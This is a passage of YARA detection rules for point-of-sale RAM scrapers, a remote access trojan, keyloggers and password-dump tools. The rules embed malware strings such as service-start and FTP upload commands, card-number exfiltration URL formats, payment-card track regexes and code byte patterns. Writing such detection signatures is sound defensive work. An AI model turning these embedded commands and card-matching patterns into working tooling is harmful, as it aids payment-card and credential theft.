   		$z = { 49 5C 4F 70 3C 52 00 00 FF FF FF FF 09 00 00 00 }   
   		$aa = { 52 4F 5E 5E 4A 4F 5A 4F 52 00 00 00 FF FF FF FF }   
   		$ab = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3D 52 00 00 }   
   		$ac = { FF FF FF FF 08 00 00 00 52 5E 5B 4C 42 47 4D 52 }   
   		   
       condition:   
           all of them   
// https://otx.alienvault.com/pulse/5674426c4637f25637d044fc
rule SpyGate_v2_9   
   {   
   	meta:   
   		date = "2014/09"   
   		maltype = "Spygate v2.9 Remote Access Trojan"   
   		filetype = "exe"   
   		reference = "https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online"   
   	strings:   
   		$1 = "shutdowncomputer" wide   
   		$2 = "shutdown -r -t 00" wide   
   		$3 = "blockmouseandkeyboard" wide   
   		$4 = "ProcessHacker"   
   		$5 = "FileManagerSplit" wide   
   	condition:   
   		all of them   
rule dump_tool   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Related to pwdump6 and fgdump tools"   
   strings:   
   	$s1 = "lsremora"   
   	$s2 = "servpw"   
   	$s3 = "failed: %d"   
   	$s4 = "fgdump"   
   	$s5 = "fgexec"   
   	$s6 = "fgexecpipe"   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule regex_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS malware - Regex"   
   strings:   
   	$n1 = "REGEXEND" nocase   
   	$n2 = "RegExpr" nocase   
   	$n3 = "regex"   
   	$s4 = "[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"   
   	$s5 = "[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"   
   	$s6 = "(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"   
   	$s7 = "(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"   
   	$s8 = "(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"   
   	$s9 = "([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})"   
   	$s10 = "((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})"   
   	$s11 = "[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*"   
   	$s12 = "\\d{15,19}=\\d{13,}"   
   	$s13 = "\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??"   
   	$s14 = "[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"   
   condition:   
   	uint16(0) == 0x5A4D and 1 of ($n*) and 1 of ($s*)   
rule unknown   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Unknown POS"   
   strings:   
   	$s1 = "a.exe" wide   
   	$s2 = "Can anyone test" wide   
   	$s3 = "I m in computer class now" wide   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule monitor_tool_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS malware - Monitoring Tool??"   
   strings:   
   	$s1 = "RCPT TO"   
   	$s2 = "MAIL FROM"   
   	$s3 = "AUTH LOGIN"   
   	$s4 = "Reply-To"   
   	$s5 = "X-Mailer"   
   	$s6 = "crypto"   
   	$s7 = "test335.txt" wide   
   	$s8 = "/c del"   
   condition:   
   	uint16(0) == 0x5A4D and 7 of ($s*)   
rule pos_uploader   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Point of Sale (POS) Malware"   
       reference = "http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware"   
   	version = "0.1"   
   	description = "Testing the base64 encoded file in sys32"   
   	date = "01/30/2014"   
   strings:   
   	$s1 = "cmd /c net start %s"   
   	$s2 = "ftp -s:%s"   
   	$s3 = "data_%d_%d_%d_%d_%d.txt"   
   	$s4 = "\\uploader\\"   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule lacy_keylogger   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Appears to be a form of keylogger."   
   strings:   
   	$s1 = "Lacy.exe" wide   
   	$s2 = "Bldg Chive Duel Rip Query" wide   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule winxml_dll   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Point of Sale (POS) Malware"   
       reference = "ce0296e2d77ec3bb112e270fc260f274"   
   	version = "0.1"   
   	description = "Testing the base64 encoded file in sys32"   
   	date = "01/30/2014"   
   strings:   
   	$s1 = "\\system32\\winxml.dll"   
   	//$s2 = "cmd /c net start %s"   
   	//$s3 = "=== pid:"   
   	//$s4 = "GOTIT"   
   	//$s5 = ".memdump"   
   	//$s6 = "POSWDS"   
   condition:   
   	uint16(0) == 0x5A4D and (all of ($s*))   
rule sets_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS malware - Sets"   
   strings:   
   	$s1 = "GET /sets.txt"   
   condition:   
   	uint16(0) == 0x5A4D and $s1   
rule searchinject   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)"   
   strings:   
   	$s1 = "SearchInject"   
   	$s2 = "inject base:"   
   	$s3 = "Searcher.dll" nocase   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule pstgdump   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "pstgdump"   
   strings:   
   	$s1 = "fgdump\\pstgdump"   
   	$s2 = "pstgdump"   
   	$s3 = "Outlook"   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule memdump_diablo   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Process Memory Dumper - DiabloHorn"   
   strings:   
   	$s1 = "DiabloHorn"   
   	$s2 = "Process Memory Dumper"   
   	$s3 = "pid-%s.dmp"   
   	$s4 = "Pid %d in not acessible" // SIC   
   	$s5 = "memdump.exe"   
   	$s6 = "%s-%d.dmp"   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule sysocmgr   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444"   
   strings:   
   	$s1 = "SYSOCMGR.EXE" wide   
   	$s2 = "System stand-alone Optional Component Manager" wide   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule pos_malwre_dexter_stardust   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Dexter Malware - StarDust Variant"   
   	version = "0.1"   
   	description = "Table 2 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"   
   	reference = "16b596de4c0e4d2acdfdd6632c80c070, 2afaa709ef5260184cbda8b521b076e1, and e3dd1dc82ddcfaf410372ae7e6b2f658"   
   	date = "12/30/2013"   
   strings:   
   	$s1 = "ceh_3\\.\\ceh_4\\..\\ceh_6"   
   	$s2 = "Yatoed3fe3rex23030am39497403"   
   	$s3 = "Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19"   
   	$s4 = "CommonFile.exe"   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule pos_malware_project_hook   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Project Hook"   
   	version = "0.1"   
   	description = "Table 1 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"   
   	reference = "759154d20849a25315c4970fe37eac59"   
   	date = "12/30/2013"   
   strings:   
   	$s1 = "CallImage.exe"   
   	$s2 = "BurpSwim"   
   	$s3 = "Work\\Project\\Load"   
   	$s4 = "WortHisnal"   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule regexpr_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS malware - RegExpr"   
   strings:   
   	$s1 = "RegExpr" nocase   
   	$s2 = "Data.txt"   
   	$s3 = "Track1"   
   	$s4 = "Track2"   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule pos_jack   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Point of Sale (POS) Malware"   
   	version = "0.1"   
   	reference = "http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html"   
   	date = "2/22/2014"   
   strings:   
   	$pdb1 = "\\ziedpirate.ziedpirate-PC\\"   
   	$pdb2 = "\\sop\\sop\\"   
   condition:   
   	uint16(0) == 0x5A4D and 1 of ($pdb*)   
rule heistenberg_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS Malware"   
   strings:   
   	$s1 = "KARTOXA"   
   	$s2 = "dmpz.log"   
   	$s3 = "/api/process.php?xy="   
   	$s4 = "User-Agent: PCICompliant" // PCICompliant/3.33   
   	$s6 = "%s:*:Enabled:%s"   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule keyfinder_tool   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Magical Jelly Bean KeyFinder"   
   strings:   
   	$s1 = "chgxp.vbs"   
   	$s2 = "officekey.exe"   
   	$s3 = "findkey.exe"   
   	$s4 = "xpkey.exe"   
   condition:   
   	uint16(0) == 0x5A4D and 2 of ($s*)   
rule reg_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS malware - RegExpr"   
   strings:   
   	$s1 = "T1_FOUND: %s"   
   	$s2 = "id=%s&log=%s"   
   	$s3 = "\\d{15,19}=\\d{13,}"   
   condition:   
   	uint16(0) == 0x5A4D and 2 of ($s*)   
rule misc_pos   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "POS Malware"   
   strings:   
   	$s1 = "KAPTOXA"   
   	$s2 = "cmd /c net start %s"   
   	$s3 = "pid:"   
   	$s4 = "%ADD%"   
   	$s5 = "COMSPEC"   
   	$s6 = "KARTOXA"   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule pos_chewbacca   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Point of Sale (POS) Malware"   
       reference = "https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware"   
       hashes = "21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54"   
   	version = "0.2"   
   	description = "Testing the base64 encoded file in sys32"   
   	date = "01/30/2014"   
   strings:   
   	$s1 = "tor -f <torrc>"   
   	$s2 = "tor_"   
   	$s3 = "umemscan"   
   	$s4 = "CHEWBAC"   
   condition:   
   	uint16(0) == 0x5A4D and (all of ($s*))   
rule pdb_strings_Rescator   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Target Attack"   
   	version = "0.3"   
   	description = "Rescator PDB strings within binaries"   
   	date = "01/30/2014"   
   strings:   
   	$pdb1 = "\\Projects\\Rescator" nocase   
   condition:   
   	uint16(0) == 0x5A4D and $pdb1   
rule pos_memory_scrapper_   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	maltype = "Point of Sale (POS) Malware Memory Scraper"   
   	version = "0.3"   
   	description = "POS Memory Scraper"   
   	date = "01/30/2014"   
   strings:   
   	$s1 = "kartoxa" nocase   
   	$s2 = "CC2 region:"   
   	$s3 = "CC memregion:"   
   	$s4 = "target pid:"   
   	$s5 = "scan all processes:"   
   	$s6 = "<pid> <PATTERN>"   
   	$s7 = "KAPTOXA"   
   	$s8 = "ATTERN"   
   	$s9 = "\\svhst%p"   
   condition:   
   	uint16(0) == 0x5A4D and 3 of ($s*)   
rule blazingtools   
   {   
   meta:   
   	author = "@patrickrolsen"   
   	reference = "Blazing Tools - http://www.blazingtools.com (Keyloggers)"   
   strings:   
   	$s1 = "blazingtools.com"   
   	$s2 = "Keystrokes" wide   
   	$s3 = "Screenshots" wide   
   condition:   
   	uint16(0) == 0x5A4D and all of ($s*)   
rule Mozart   
   {   
      meta:   
          author = "Nick Hoffman - Morphick Inc"   
          description = "Detects samples of the Mozart POS RAM scraping utility"   
          reference = "http://securitykitten.github.io/the-mozart-ram-scraper/"   
      strings:   
          $pdb = "z:\\Slender\\mozart\\mozart\\Release\\mozart.pdb" nocase wide ascii   
          $output = {67 61 72 62 61 67 65 2E 74 6D 70 00}   
          $service_name = "NCR SelfServ Platform Remote Monitor" nocase wide ascii   
          $service_name_short = "NCR_RemoteMonitor"   
          $encode_data = {B8 08 10 00 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 8B AC 24 14 10 00 00 89 84 24 0C 10 00 00 56 8B C5 33 F6 33 DB 8D 50 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C2 89 44 24 0C ?? ?? 8B 94 24 1C 10 00 00 57 8B FD 2B FA 89 7C 24 10 ?? ?? 8B 7C 24 10 8A 04 17 02 86 E0 BA 40 00 88 02 B8 ?? ?? ?? ?? 46 8D 78 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C7 3B F0 ?? ?? 33 F6 8B C5 43 42 8D 78 01 8A 08 40 84 C9 ?? ?? 2B C7 3B D8 ?? ?? 5F 8B B4 24 1C 10 00 00 8B C5 C6 04 33 00 8D 50 01 8A 08 40 84 C9 ?? ?? 8B 8C 24 20 10 00 00 2B C2 51 8D 54 24 14 52 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B D6 5E 8D 44 24 0C 8B C8 5D 2B D1 5B 8A 08 88 0C 02 40 84 C9 ?? ?? 8B 8C 24 04 10 00 00 E8 ?? ?? ?? ?? 81 C4 08 10 00 00}   
      condition:   
         any of ($pdb, $output, $encode_data) or   
         all of ($service*)   
// https://otx.alienvault.com/pulse/56c6541867db8c125017a17f
rule LogPOS   
   {   
       meta:   
           author = "Morphick Security"   
           description = "Detects Versions of LogPOS"   
           md5 = "af13e7583ed1b27c4ae219e344a37e2b"   
       strings:   
           $mailslot = "\\\\.\\mailslot\\LogCC"   
           $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="   
           //64A130000000      mov eax, dword ptr fs:[0x30]   
           //8B400C        mov eax, dword ptr [eax + 0xc]   
           //8B401C        mov eax, dword ptr [eax + 0x1c]   
           //8B4008        mov eax, dword ptr [eax + 8]   
           $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }   
       condition:   
           $sc and 1 of ($mailslot,$get)   
// https://otx.alienvault.com/pulse/57f5911b41c73131b588f79b
rule PoS_Malware_fastpos2 : FastPOS2   
   {   
   meta: